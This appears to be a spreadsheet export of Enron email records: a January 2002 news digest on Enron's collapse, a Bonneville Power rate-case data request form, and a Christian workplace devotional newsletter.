    <t>Enron Mentions -- 01/25/02</t>
  </si>
  <si>
    <t>_x000D_
USA: Enron disclosed insider data to some investors-NYT._x000D_
Reuters English News Service, 01/25/2002_x000D_
_x000D_
Enron may get new boss _x000D_
Houston Chronicle, 01/25/2002_x000D_
_x000D_
Enron's new CEO could could be savior or victim_x000D_
Associated Press Newswires, 01/25/2002_x000D_
_x000D_
Lay's exit prompts mixed reactions _x000D_
Houston Chronicle, 01/25/2002_x000D_
_x000D_
Ex-staffers say Enron division inflated profits_x000D_
Chicago Tribune, 01/25/2002_x000D_
_x000D_
Jesse Jackson To Hold Enron Rally Today_x000D_
KPRC Channel 2 Houston, 01/25/2002_x000D_
_x000D_
Enron's fall piques Congress' interest in 401(k) rules_x000D_
Chicago Tribune, 01/25/2002_x000D_
_x000D_
Enron: The Fallout_x000D_
The history of a head-spinning conglomerate: Wall Street darling: Enron trader was an unregulated commodities exchange_x000D_
National Post, 01/25/2002_x000D_
_x000D_
Following The Paper Trail In The Enron-Andersen Scandal_x000D_
Dow Jones Energy Service, 01/25/2002_x000D_
_x000D_
Developments related to the Enron collapse and investigation_x000D_
Associated Press Newswires, 01/25/2002_x000D_
_x000D_
First Day of Document Shredding Probe Gives Few Answers_x000D_
CNN: Live at Daybreak, 01/25/2002_x000D_
_x000D_
Enron's Australian Unit Faces Being Placed in Liquidation_x000D_
Dow Jones Business News, 01/25/2002_x000D_
_x000D_
Enron case already leads to several book deals_x000D_
Associated Press Newswires, 01/25/2002_x000D_
_x000D_
Charities planning to carry on without the benefit of Enron's philanthropic giving_x000D_
Associated Press Newswires, 01/25/2002_x000D_
_x000D_
The Enron debacle How could it have happened? What should be done? What lessons should be learned? What you're saying READER'S SOUND OFF Take stock of Enron's fall SMOKE AND MIRRORS_x000D_
Orlando Sentinel, 01/25/2002_x000D_
_x000D_
Friday Forum This week's topic: The Enron debacle How could it have happened? What should be done? What lessons should be learned? What you're saying READER'S SOUND OFF Take stock of Enron's fall WORDS TO THE WISE_x000D_
Orlando Sentinel, 01/25/2002_x000D_
_x000D_
_x000D_
____________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
USA: Enron disclosed insider data to some investors-NYT._x000D_
_x000D_
01/25/2002_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2002._x000D_
_x000D_
NEW YORK, Jan 25 (Reuters) - Enron Corp. executives enticed wealthy investors in one of the partnerships that helped wreck the company with the prospect that inside knowledge could help double their money in months, the online edition of the New York Times reported on Friday. _x000D_
Confidential records of an Enron partnership called LJM2 show company executives offering potential investors inside knowledge about Enron and its off-the-books holdings, information that they denied company shareholders, the Times said._x000D_
Neither Enron nor Merrill Lynch and Co. Inc. , which underwrote the LJM2 offering, were immediately available to comment on the story. _x000D_
Dozens of banks, brokerage firms, pension funds and institutional investors were approached to invest in LJM2 just over two years ago, and all were provided with the confidential data about the extent of Enron's off-balance-sheet dealings, but could not share the information with their brokerage clients, according to the Times. _x000D_
The LJM2 partnership was set up, in part, to invest in entities that Enron controlled and to purchase investments that Enron did not want on its books, the Times said. _x000D_
"Enron frequently has access to investment opportunities that are not available to other investors," the Times quotes the private placement memorandum for LJM2._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Enron may get new boss _x000D_
Candidate talking with directors, creditors _x000D_
By DAVID IVANOVICH _x000D_
Copyright 2002 Houston Chronicle _x000D_
Jan. 25, 2002, 1:43AM_x000D_
WASHINGTON -- A candidate tapped by Enron's board of directors and largest creditors to assume the company's helm will meet with Enron managers as early as today. _x000D_
Moving quickly to fill the void left after the departure of Chairman Ken Lay, the board and creditors committee were known to be talking with Stephen Cooper, managing principal at Zolfo Cooper, a New York-based corporate-recovery and crisis-management firm. _x000D_
Cooper served as chief restructuring officer at Ontario-based Laidlaw Inc., the largest ground transportation company in North America and owner of Greyhound Lines. _x000D_
Previously, Cooper was a partner in the accounting firm Touche Ross &amp; Co. _x000D_
Cooper could not be reached for immediate comment Thursday night. And Martin Bienenstock, an attorney with Weil, Gotshal &amp; Manges representing Enron in its bankruptcy case, declined to say whether Cooper is indeed the front-runner for the job. _x000D_
Whether he actually gets the job will depend on how the meetings with Enron's remaining executives go today, Bienenstock said. _x000D_
Corporate turnaround experts say Enron will need an executive with enough credibility to stem the scandals swirling around the company and stave off an effort to persuade U.S. Bankruptcy Court Judge Arthur Gonzalez to order the appointment of a trustee to run the company. _x000D_
"A Rudy Guiliani, that's what's called for, somebody of that stature," said one corporate restructuring expert who asked not to be named. "Or a George Mitchell." _x000D_
Guiliani, the former mayor of New York, drew high marks for his leadership in the wake of the terrorist attacks on the World Trade Center. Mitchell, a former senator from Maine, helped negotiate a peace accord in Northern Ireland. _x000D_
While not identifying the individual, Bienenstock called the board and creditor committee's candidate "a very, very solid citizen." _x000D_
Cooper is not well-known in Houston's energy sector. _x000D_
"Understanding Greyhound is a lot different from understanding Enron," said one energy industry observer. "The energy industry is many times more complex, and the Enron version of that is even more complex." _x000D_
Carol Coale, a Houston-based natural gas analyst at Prudential Securities, doesn't think the search for a new boss at Enron should range outside the energy industry. _x000D_
"The energy industry is diverse enough where you could find the right person that has knowledge of energy," Coale said. "I don't see what the advantages are of going outside." _x000D_
John Olson, an energy analyst with Sanders Morris Harris in Houston, was not surprised Enron's board and creditors were shopping outside the sector. _x000D_
"What you need is somebody who has been totally removed," Olson said. The company's new turnaround expert needs to be a "debt management guy who can restructure the debt and who also knows all about the derivatives books, which clearly requires some expertise in voodoo." _x000D_
Lay, whose name for years has been synonymous with the staid natural gas pipeline company he transformed into an energy and trading powerhouse, stepped down late Wednesday at the creditors' urging. _x000D_
"I want to see Enron survive, and for that to happen we need someone at the helm who can focus 100 percent of his efforts on reorganizing the company," Lay said. "Unfortunately, with the multiple inquiries and investigations that currently require much of my time, it is becoming increasingly difficult to concentrate fully on what is most important to Enron stakeholders." _x000D_
The creditors' committee, in a prepared statement, said it was pleased by Lay's exit. "This is a step in the right direction, to maximize value for all creditors," it said. "The committee is also encouraged that Enron is proceeding with the retention of a chief restructuring officer." _x000D_
By naming a chief restructuring officer, Enron's board and creditors clearly are hoping to head off the appointment of a trustee. _x000D_
Trustees traditionally are known for breaking up rather than resuscitating debt-laden companies. A trustee also would call all the shots at the company, superseding the role of the board and the company management. _x000D_
A group of Enron creditors, led by Dallas-based Wiser Oil Co., are pushing for just such an appointment. _x000D_
To persuade a bankruptcy court to name a trustee, Wiser and its allies would have to find enough evidence to demonstrate fraud, mismanagement or incompetence. _x000D_
_x000D_
_x000D_
Enron's new CEO could could be savior or victim_x000D_
By KRISTEN HAYS_x000D_
Associated Press Writer_x000D_
_x000D_
01/25/2002_x000D_
Associated Press Newswires_x000D_
Copyright 2002. The Associated Press. All Rights Reserved._x000D_
_x000D_
HOUSTON (AP) - Kenneth Lay's successor as Enron Corp.'s chief executive could be the hero who saves the bankrupt energy giant or a well-intentioned outsider blindsided by yet-unseen punches. _x000D_
"In a sense, it provides a big showcase for your talents," said Henry T.C. Hu, a corporate law professor at the University of Texas. "Presumably you could think the bulk of the bad has come out. But one is not entirely sure."_x000D_
But anyone willing to take the chance - or seize the opportunity - likely has a thick skin, he said. _x000D_
'Any time you're dealing with bankruptcy proceedings and distress situations, you've already developed a lot of callouses," Hu said. "You don't feel it anymore." _x000D_
Lay resigned as chairman and chief executive Wednesday, saying the multitude of lawsuits and investigations into Enron's spectacular collapse in an accounting scandal is preventing him from properly running the company. _x000D_
Enron said it will search for a restructuring specialist to serve as interim chief executive and help the company survive the biggest bankruptcy in history. _x000D_
"They're going to need someone with a specialization in these situations that can devote 100 percent of his time to business matters of the company," said Mike Greenberger, a law professor at the University of Maryland. "It's impossible to deal with Congress and the Justice Department and try to resuscitate a company at the same time." _x000D_
Lay, 59, will remain on Enron's board. Enron spokesman Vance Meyer said he will not receive a severance package. _x000D_
Lay was chairman and CEO for almost all of the 16 years since the company was created from a 1985 merger of two natural gas pipeline companies. In that time Enron grew from a mildly profitable business into the world's largest energy marketer. It diversified its trading to include pulp, paper and bandwidth, among other commodities. _x000D_
Enron reached No. 7 on the Fortune 500 and earned hundreds millions in reported profits while concocting financial partnerships that allowed the company to keep half a billion dollars in debt off its books. _x000D_
Last year, the accounting practice was exposed, and Enron's stock slid to less than a dollar from about $80. The company filed for Chapter 11 bankruptcy, and thousands of Enron employees lost their jobs, as well as much of their life savings, since their 401(k) accounts were loaded with company stock. _x000D_
Congress, the Justice Department, the Securities and Exchange Commission and others are investigating. Lay and the company face numerous lawsuits and increasing criticism from employees, shareholders and politicians demanding answers as to how Enron could implode so savagely. _x000D_
William Brandt Jr., president and chief executive of Development Specialists, a Chicago-based firm that helps distressed businesses rebound, said Enron's next CEO could be a trustee appointed by the judge overseeing the bankruptcy in New York. _x000D_
A trustee would answer to the judge rather than Enron's board or its creditors, Brandt said. A showing of fraud, mismanagement or incompetence of previous management traditionally supports the appointment of a trustee. _x000D_
Hu said that if Enron ends up appointing a CEO, it must be someone who inspires confidence without expecting the typical perks of top executives, such as stock options. _x000D_
The lure would be the reputation boost that would come from saving a company from such a huge, controversial downfall, he said. _x000D_
"There's a lot more laughter and mirth when you're an obstetrician rather than when you're a coroner," Hu said. "And here, you're a coroner. It's an enormously difficult task. And everybody's looking over your shoulder."_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Lay's exit prompts mixed reactions _x000D_
Amid praise for ex-CEO, many say his departure is overdue _x000D_
By MARY VUONG _x000D_
Copyright 2002 Houston Chronicle _x000D_
Jan. 25, 2002, 12:03AM_x000D_
Overdue. Appropriate. Best for the company. _x000D_
Those were the thoughts of some former Enron employees on Ken Lay's resignation as chairman and chief executive officer of Enron. _x000D_
Respected. Upstanding. Personable. _x000D_
Those were the words they used to describe the man, as they waited Thursday for relief from a fund set up for former employees. _x000D_
"Everybody saw him as sort of a grandfatherly figure," said Steve Crumley, a former manager with the broadband unit. A man you looked up to and trusted, Lay "had a good head on his shoulders," added Crumley, 43, of The Woodlands. _x000D_
"Very caring, very giving, very personable -- maybe just like the guy next door," said Nathan Childs, 36, of Kempner, who was a technician for the information technology hardware department. _x000D_
"All of us thought very highly of Ken Lay," said Helena G. Payne, a senior accounting clerk before retiring last March after 24 years. She lost her 401(k) funds following Enron's collapse. _x000D_
Payne, 61, said she occasionally met Lay when he strolled through departments or at special breakfasts on the 50th floor in which about a dozen employees discussed grievances with him. _x000D_
"He had an open-door-type atmosphere," and made sure his managers and directors did the same, she said. _x000D_
Juantongia Calvin, who worked in global management, held Lay in the "highest regards" before Enron's collapse. She still does, she said. _x000D_
He took care of employees, and his community activism pushed her to get involved as well, said Calvin, 30, of Houston. "He was one of the most respected persons I had ever met or worked for." _x000D_
Lay was not a mysterious figure nor did he ride in his own private elevator, recalled former accounting specialist Sue Nix, yet he was hardly someone you bumped into in the cafeteria. _x000D_
Nix, 57, a Huffman resident, said she encountered Lay on the elevator regularly. "He would talk to you just as if you were as important as anybody else." _x000D_
In one elevator ride, Nix said, Lay showed her two grandsons -- who had accompanied her to work -- how to piece together a puzzle. _x000D_
"It proved he was human," she said. "I always was very proud when (people) spoke of Ken Lay." _x000D_
Nix said her view of Lay "hasn't really changed. So much blame has been put on his shoulders." _x000D_
Several of those interviewed said their perceptions of Lay have shifted, albeit not very dramatically. He is to blame for some of Enron's failure, although how much is not yet clear to them, they said. _x000D_
They believe other executives and senior managers are responsible, too, such as former CEO Jeffrey Skilling and former Chief Financial Officer Andy Fastow. _x000D_
"I feel like maybe (Lay) was influenced by the wrong type of people," Payne said. _x000D_
"I thought (Lay) was a really wonderful man," said Kimberly Niekamp, a former accounting specialist. "I thought it was all (Skilling's fault)." _x000D_
Now, Niekamp, 38, of Humble said, she doesn't know what to say or think of Lay. "A terrible person," she offered in a questioning tone. _x000D_
There is a sense that maybe he was greedy, disconnected and too focused on the political process, said Crumley, adding, "He should've focused more on the realities of running the business." _x000D_
Calvin said Lay could have prevented Enron's failure, but that others could have as well. _x000D_
"I blame the people responsible for taking the millions," Childs said. _x000D_
Whether Enron can return to its previous glory is questionable or unlikely, some said. _x000D_
"I'm not sure that it (Lay's resignation) is going to help Enron get back on its feet," Crumley said, but restoring the company "would be tough with him at the helm." _x000D_
Payne said it was necessary Lay resign to handle all the lawsuits and it was best for the company to move forward. _x000D_
"I don't look for Enron to come back as Enron," Nix said. _x000D_
_x000D_
News_x000D_
Ex-staffers say Enron division inflated profits_x000D_
Alex Berenson, New York Times News Service_x000D_
_x000D_
01/25/2002_x000D_
Chicago Tribune_x000D_
North Sports Final ; N_x000D_
12_x000D_
(Copyright 2002 by the Chicago Tribune)_x000D_
_x000D_
A division of Enron Corp. overstated its profits by hundreds of millions of dollars over the past three years, and senior Enron executives were warned almost a year ago that the division's profits were illusory, according to several former employees. _x000D_
The division, Enron Energy Services, created in 1997, competed with utilities to sell electricity and natural gas to commercial and industrial customers. It was run by Lou Pai, who sold $353 million in Enron stock in the past three years, more than any other Enron executive, and Thomas White, who left Enron to become secretary of the Army last June._x000D_
Energy Services accounted for a small part of Enron's revenues but was promoted by the company as a big growth opportunity. _x000D_
But former employees suggest that Energy Services used shoddy accounting practices to create "illusory earnings," in the words of Jeff Gray, who joined Enron in 2000 and worked at the division for most of 2001. _x000D_
For example, by estimating that the price of electricity would fall in the future, Enron could book an immediate profit on a contract. By contrast, companies using traditional accounting book profits only as they deliver the services. _x000D_
A spokesman for White did not return calls for comment. Pai and a spokesman for Enron also did not return calls. _x000D_
Peggy Mahoney, a spokeswoman for Energy Services, said the division's financial results had accurately reflected its business. "It was no pie in the sky," she said. _x000D_
As a result of its practice of projecting profits, Energy Services salespeople and senior managers pressured the managers who made the key assumptions about deregulation and energy prices, said Glenn Dickson, a manager at Energy Services who was dismissed in December. _x000D_
"The whole culture was much more sales driven than anything else," Dickson said. "The people that were having to sign off on the deals with a gun to their head knew that it wasn't a good deal." _x000D_
Dickson and other former employees said senior executives at Energy Services knew that their assumptions were unreliable. _x000D_
At the same time, expenses ballooned as Energy Services found that the costs of managing its contracts were higher than it had projected. _x000D_
"They knew how to get a product out there, but they didn't know how to run a business," said Tony Dorazio, a former product development manager at Energy Services. _x000D_
None of the ex-employees said they knew whether Pai or White was aware of any accounting lapses at Energy Services._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Jesse Jackson To Hold Enron Rally Today_x000D_
Job Search Help Available Online_x000D_
Posted: 9:18 a.m. CST January 25, 2002_x000D_
Updated: 9:44 a.m. CST January 25, 2002_x000D_
KPRC, Channel 2, Houston_x000D_
HOUSTON -- The Enron Corp.'s ex-workers will take center stage Friday as the Rev. Jesse Jackson holds a rally in their honor. _x000D_
The rally will be held at noon Friday at the Antioch Missionary Baptist Church, which is across the street from Enron's headquarters in downtown. _x000D_
Jackson said that Houston-area ministers and members of his Rainbow Coalition will unite in prayer as a sign of support to help rally for financial assistance for the Enron employees left jobless and with shriveled 401(k) accounts, which were mostly invested in the now bankrupt company. _x000D_
"(The laid-off workers) hands were tied behind their backs as their life's savings went down the river," Jackson said. _x000D_
Jackson tried to meet with former Enron Chief Financial Officer Kenneth Lay Thursday night, but was turned away. _x000D_
Lay's secretary said that he didn't have time to meet with Jackson. _x000D_
But Lay told Jackson that he had a family emergency. _x000D_
"It's not personal," Jackson said. _x000D_
Before the rally, Jackson met with business and community leaders to see what more could be done for the fired workers. _x000D_
Job Search Help_x000D_
Enron is helping laid-off workers look for jobs by posting their resumes online. _x000D_
_x000D_
Former employees can e-mail their resumes to careerservices@enron.com. _x000D_
_x000D_
News2Houston and Click2Houston.com are also helping laid-off employees. _x000D_
_x000D_
Employers looking to hire workers can post their job openings on Click2Houston. For more information, log onto the discussion page._x000D_
_x000D_
The Labor Department is also trying to help laid-off Enron employees. It activated a toll-free hot line to take calls from laid-off Enron employees, which directs them to nearby One-Stop employment centers. The number is (877) US2-JOBS. _x000D_
_x000D_
_x000D_
News_x000D_
Enron's fall piques Congress' interest in 401(k) rules_x000D_
Michael Tackett, Tribune senior correspondent_x000D_
_x000D_
01/25/2002_x000D_
Chicago Tribune_x000D_
North Sports Final ; N_x000D_
1_x000D_
(Copyright 2002 by the Chicago Tribune)_x000D_
_x000D_
On Dec. 21, 1999, in Enron's chest-puffing days, the company churned out a press release to tout its status as one of Fortune magazine's "100 best companies to work for in America." _x000D_
"Our corporate culture and our world-class employees make Enron a great place to work," said Kenneth Lay, the company's chairman and chief executive officer. "We are proud to receive recognition as a top workplace; it's a reflection of our commitment to our employees and their key role in our company's success."_x000D_
Now Lay has resigned, and Enron Corp.'s commitment to employees, especially its retirement savings plans, is under high-profile congressional scrutiny. And the story of how many Enron workers watched their 401(k) plans, the savings programs designed to ensure a comfortable retirement, become nearly worthless is sparking a broader debate on the potent political issue of retirement security. _x000D_
Some lawmakers and pension specialists are wondering if the Enron case will be for the 401(k) plan what the Studebaker case of nearly 40 years ago was to more traditional company pension plans. In the Studebaker case, workers were shocked to find their pension benefits were not guaranteed when the company terminated the plan in 1963. _x000D_
That case prompted Congress to eventually pass the Employee Retirement Income Security Act of 1974, establishing among other things a government guarantee of defined-benefit pension plans. But those protections do not apply to 401(k) plans, which have dramatically overtaken traditional pensions in number in the last 15 years. _x000D_
"I've watched this go from a backwater technical issue no one paid attention to, to now being one of the core issues people think of," said Rep. Earl Pomeroy (D-N.D.), a leading pension authority in Congress. "As a result, the politics behind it have grown hotly charged as well. _x000D_
"This is a mixed blessing. The good news is Congress is now interested," Pomeroy said. "The bad news is Congress is now interested. This is an area where ill-advised, well-intentioned legislation can do some serious damage." _x000D_
Even before the hearings started, several legislative proposals have been introduced. One, by Sens. Barbara Boxer (D-Calif.) and Jon Corzine (D-N.J.), would limit employee contributions in company stock to 20 percent of the total and employees could convert any matching company stock to another financial instrument within 90 days. To reduce the appeal of granting a match in stock, the legislation also would cut tax breaks for matching company stock in half. _x000D_
Another proposal, offered by Rep. Charles Rangel (D-N.Y.), calls for a federal tax penalty on sales of stock by company insiders if other lower-ranking employees are restricted. _x000D_
The federal government can only loosely regulate most employee benefits because companies provide them on a voluntary basis. And, as workers often come to find, companies almost universally reserve the right to change, amend or terminate any or all of those benefits. _x000D_
Buffet of benefits _x000D_
Businesses are far more likely, however, to emphasize benefits as an inducement to sign on and stay with a company. Enron's employee handbook, for instance, lays out a rich buffet of benefits in addition to the 401(k) plan: a stock options plan that awarded up to 25 percent of salary in Enron stock options; subsidized membership at The Body Shop fitness center, complete with tai chi and Pilates classes; and an on-site doctor's office. _x000D_
Like many companies, Enron also offered a 401(k) savings plan, listing its stock as the first option of many investment funds available. The company matched each $1 an employee contributed with 50 cents worth of Enron stock. _x000D_
Those who chose the Enron option were rewarded famously as the stock value soared. But as Enron's stock plummeted, they learned the crushing reality of the risk inherent in 401(k) plans. The plaintive stories of families whose retirement savings were wiped out will no doubt be told during the hearings. _x000D_
Congress is likely to respond in some fashion, and Pomeroy and others are concerned that lawmakers could actually set back the cause of retirement security. For instance, if Congress were to regulate 401(k) plans too heavily, companies might choose to not offer them, putting workers' retirement finances in even greater peril. _x000D_
Companies also could choose to provide no match. Indeed, as salaried workers at Ford Motor Co. found recently, that company match is voluntary and Ford suspended its contribution to 401(k) plans for 2002. What's more, the government can guarantee a pension plan because it is not based on an employee making an investment decision. Similar protection for a 401(k) plan would be tantamount to the government guaranteeing an ever-rising rate of return. _x000D_
Defined-benefit plans, promising a certain amount of money for life upon retirement, are far more easily regulated than 401(k) plans, whose results depend on market forces and individual choices. In the last 10 years, most 401(k) plans clearly increased in value that would have far exceeded defined-benefit plans. _x000D_
Shifting of risk _x000D_
But it is also true that most companies, desirous of having employees control large blocks of stock, encourage investment in company stock. When that stock goes down in value, the risk of the investment becomes harshly clear. _x000D_
The number of American workers covered by some form of pension plan has remained nearly constant for 25 years, at about 50 percent of the private sector labor force. But over that time, the number covered by 401(k), or defined-contribution, plans has far exceeded those covered by the more traditional defined-benefit plans. With that move has also come a shifting of risk, from the employer to the employee. _x000D_
"The shift from the defined-benefit plan to the defined- contribution plan has left employees with a great deal more exposure than they had under traditional pension plans," Pomeroy said. "And, to my knowledge, Congress has never had a hearing on this great shift." _x000D_
That may well be about to change. And there are those who are pushing for Congress to take a more aggressive stance. For one, Karen Friedman, director of policy strategies of the Pension Rights Center in Washington, said Congress should "enact protections to see that Enron doesn't happen again." _x000D_
"One big question that this raises is: Are we, in this society, overreliant on the 401(k) plan and other non-insured savings plans?" Friedman said. "We think this is the perfect time to have that debate. We've been warning of the perils of 401(k) plans for years and years. Maybe 401s were great in a bull market. The question is, are they the right plan in today's market?" _x000D_
For now, how that question will be answered falls to Congress. _x000D_
"You know Congress is going to be looking for one," Pomeroy said, "or if not one, a darned good press release."_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
World_x000D_
Enron: The Fallout_x000D_
The history of a head-spinning conglomerate: Wall Street darling: Enron trader was an unregulated commodities exchange_x000D_
Jan Cienski_x000D_
National Post_x000D_
_x000D_
01/25/2002_x000D_
National Post_x000D_
National_x000D_
A10_x000D_
(c) National Post 2002. All Rights Reserved._x000D_
_x000D_
WASHINGTON - Enron may have got its start in the lunch-bucket industry of natural gas pipelines, but in its glory days as the seventh-largest company in the United States it claimed it had rewritten the laws of economics by using the power of the Internet. _x000D_
But like the high-flying dot.coms it emulated, the company came crashing down to earth, felled by a suspect business model and crooked accounting on an eye-popping scale._x000D_
While employees in Houston lament their vanished retirement savings and Washington goes into scandal mode, law enforcement officials, politicians and financial regulators are trying to piece together what went wrong and why. _x000D_
It all began so simply. _x000D_
In 1986, Kenneth Lay was appointed chief executive officer of Houston-based Enron, the result of a merger between two steady but unspectacular pipeline companies, Houston Natural Gas and InterNorth. _x000D_
The business was uncomplicated and profitable at the start: It would sell a specific supply of natural gas to a utility or business on a certain day. _x000D_
Dissatisfied with remaining an energy small fry in the capital of big oil Texas, Mr. Lay dreamed big. _x000D_
The only way his company could grow was to speed along energy deregulation then being contemplated by Washington. Enron quickly got into the lobbying game, pressing the case for less government control of the energy business. _x000D_
It and other energy companies got their way in 1992, when the Commodity Futures Trading Commission, headed by Wendy Gramm, the wife of the powerful Texas Senator Phil Gramm, exempted Enron and other power marketers from its oversight. _x000D_
She was rewarded with a place on the company's board of directors and Enron got into the complicated business of being an energy broker. _x000D_
Instead of simply selling natural gas it was carrying in its own pipelines, it began to use its trading and negotiating skills to sell electricity. _x000D_
Quickly, Enron diversified and began trading anything that could be made into a commodity, a head-spinning conglomeration of businesses that included everything from high-speed Internet capacity to interest rates fluctuations to weather changes. _x000D_
The company took its cut from both the buyer and the seller, essentially acting as an unregulated commodities exchange. _x000D_
Meanwhile, it bought up utilities around the world, such as Britain's Wessex Water, for which it paid US$2.2-billion, a power plant in India and another in Oregon. It also dabbled in unrelated areas, like a plan to build a high-speed broadband telecommunications network and signing a 20-year deal with Blockbuster Video to sell video on demand. _x000D_
Wall Street quickly took notice. In 1997, Enron shares were trading for less than $20. In August, 2000, they reached their all-time high of $84. _x000D_
Everyone jumped aboard the bandwagon. Financial journalists extolled Enron as the new exemplar, stockholders got rich, as did the company's growing corps of workers, many of whom ploughed their pension savings into Enron shares. _x000D_
Politicians also got their cut. Enron became one of the United States' largest political donors, lavishing $1.7-million during the 2000 elections alone (75% of that went to Republicans). _x000D_
Enron is the biggest lifetime contributor to George W. Bush, spending almost $600,000 on the U.S. President and former Texas governor. Mr. Lay made it into the inner circles of power -- to the point of being called "Kenny-boy" by the nickname-loving commander-in-chief and becoming the only energy executive allowed to meet Dick Cheney, the U.S. Vice-President, when he was crafting the administration's energy policy last year. _x000D_
A big billboard in Enron's gleaming 50-storey headquarters in downtown Houston displayed the ever-climbing share price. _x000D_
The company splashed around its money, spending $100-million on the must-have for dot.coms, an eponymous sports stadium. _x000D_
When many high-tech companies flamed out, Enron continued to soar -- investors were reassured by the tangible assets like pipelines and power plants backing its earnings rise. _x000D_
The only problem was it wasn't making nearly enough money to justify its valuation and was being swamped by debt. _x000D_
Seeking to stave off a share price collapse, its executives began creating shell partnerships, many of them named after Star Wars and Jurassic Park characters, to keep the debt off its books. _x000D_
One such partnership, Chewco, fronted by chief financial officer Andrew Fastow, took more than $600-million in debt. The privileged secret investors who were allowed to take part in the partnerships were promised any losses would be made up in cash or Enron stock. _x000D_
Those kinds of fudges made Enron appear highly profitable. _x000D_
Arthur Andersen, the accountants who were supposed to make sure Enron's records followed the law, became increasingly uncomfortable. Last February, the accounting firm even considered dropping Enron as a client. _x000D_
But any squeamishness was overcome by the mo</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 08:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lwolv@worldaccessnet.com'})</t>
  </si>
  <si>
    <t>WP-02 Data Request</t>
  </si>
  <si>
    <t>request_number:  IN-BPA:  031_x000D_
firstname:  Lincoln_x000D_
lastname:  Wolverton_x000D_
e-mail:  lwolv@worldaccessnet.com_x000D_
directed_to:  Peter Burger_x000D_
Bonneville Power Administration_x000D_
exhibit_wp-02-e-:  WP-02-E-BPA-76_x000D_
page_numbers:  3-6_x000D_
request_text:  Please provide an electronic copy of the program and files _x000D_
sufficient to produce the net revenues portrayed in case:_x000D_
RM_Merged_$210_S2000_LR1500.xls and_x000D_
RevSim Input Database: _x000D_
V:\RateCase0206__Supplemental\0209\Fy02$210\S2000_LR1500\RiskData_Supplemental_x000D_
FY02$210.mdb, ... Date/Time of Report: 2/10/01 8:06:00 AM._x000D_
_x000D_
Please ensure that the program will run on a standalone, non-Bonneville _x000D_
computer-that is, a computer that does not require access to files available _x000D_
only on a BPA computer._x000D_
_x000D_
_x000D_
contact_name:  Linc Wolverton_x000D_
contact_address:  East Fork Economics_x000D_
P.O. Box 620_x000D_
35011 North Fork Rd._x000D_
La Center, WA  98629_x000D_
_x000D_
contact_phone:  360-263-3675_x000D_
contact_email:  lwolv@worldaccessnet.com_x000D_
contact_fax:  360-263-3675_x000D_
delivery_instructions:  Data Responses will be picked up by courier:  call _x000D_
Linda Vitale of Davison Van Cleve, P.C. at 503-241-7242._x000D_
_x000D_
The following information is from the web server:_x000D_
1.  Logon: PSP-TEN_x000D_
2.  Remote Host:  63.230.164.97_x000D_
3.  Remote IP Address:  63.230.164.97_x000D_
4.  Form URL:  _x000D_
https://secure.bpa.gov/power/secure/psp/ratecase/discovery/wp_02_request.html_x000D_
5.  Browser Client:  Mozilla/4.73 [en]C-DIAL  (Win98; U)</t>
  </si>
  <si>
    <t>Fri, 23 Nov 2001 01:12:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marketplace@lists.crosswalk.com'})</t>
  </si>
  <si>
    <t>TGIF Marketplace Meditation --  Fruitful Suffering</t>
  </si>
  <si>
    <t xml:space="preserve">If you are looking to feed and challenge your faith, visit_x000D_
Crosswalk.com's Spiritual Life Channel at:_x000D_
http://spiritual.crosswalk.com_x000D_
-----------_x000D_
T O D A Y    G O D    I S    F I R S T_x000D_
                  Marketplace Meditations_x000D_
                       by Os Hillman_x000D_
_x000D_
Fruitful Suffering_x000D_
_x000D_
..."It is because God has made me fruitful in the land of my_x000D_
suffering."_x000D_
- (Genesis 41:52)_x000D_
_x000D_
_x000D_
Joseph named his second son Ephraim. Ephraim was given to him_x000D_
after he had been delivered from his suffering of 13 years._x000D_
Joseph said that he named him this because God had made him_x000D_
fruitful in the land of his suffering. Ephraim means "twice_x000D_
fruitful."_x000D_
_x000D_
Joseph was fruitful in two instances. He was fruitful during his_x000D_
time of adversity and in his prosperity. When God brings us into_x000D_
a time of suffering, it can be a fruitful time. It's rare for us_x000D_
to see the fruit during the suffering period. But know that the_x000D_
roots are going deep into the spiritual soil of our soul because_x000D_
of our pressing in to God during our time of suffering. This is_x000D_
producing a work in our character that cannot be seen until it_x000D_
finishes the process. Such was the case for Joseph._x000D_
_x000D_
It was not until several years after such a time of suffering_x000D_
that I began to see the fruit of the trials that the Lord allowed_x000D_
me to experience. How grateful I am to understand some of the_x000D_
"why" that has led to a new life in Him that I would never have_x000D_
had without this period._x000D_
_x000D_
Samson had great anointing but lacked character. We see many_x000D_
today who have great anointing yet lack character. But God is_x000D_
raising up Josephs who not only have great anointing for these_x000D_
days but also great character. Suffering produces character._x000D_
_x000D_
If you find yourself in a time of suffering, now is the time to_x000D_
press into God. Let your roots grow deeper. Whenever there is a_x000D_
famine, tree roots are forced to drive deeper into the soil to_x000D_
find water. These times are designed to create such a deep-rooted_x000D_
faith that our natures will be changed forever._x000D_
_x000D_
* * * * * * * * * * * * Author's Note * * * * * * * * * * *_x000D_
_x000D_
Want some practical ways to integrate your faith and work?_x000D_
Read the free article Christians At Work._x000D_
Send email to christiansatwork@quicktell.com._x000D_
We will forward it to you._x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
_x000D_
Published and distributed by Crosswalk.com, this daily devotional is_x000D_
written by Os Hillman (os@marketplaceleaders.org).  Os is president of_x000D_
Marketplace Leaders, an Atlanta based ministry teaching Biblical_x000D_
principles for career and business success.  He offers a FREE newsletter_x000D_
and other resources at:_x000D_
http://www.marketplaceleaders.org_x000D_
_x000D_
Order "TGIF: Today God I s  First" - 365 daily meditations to motivate_x000D_
and inspire for $17 for TGIF subscribers. Click here to order:_x000D_
_x000D_
http://www.marketplaceleaders.org/displayroom/skudetail.nhtml?uid=10055_x000D_
_x000D_
To support Os Hillman  &amp; Marketplace Leaders , click:_x000D_
 https://nhf.org/applications/donate.htm?FDN=Marketplace%2BLeaders_x000D_
_x000D_
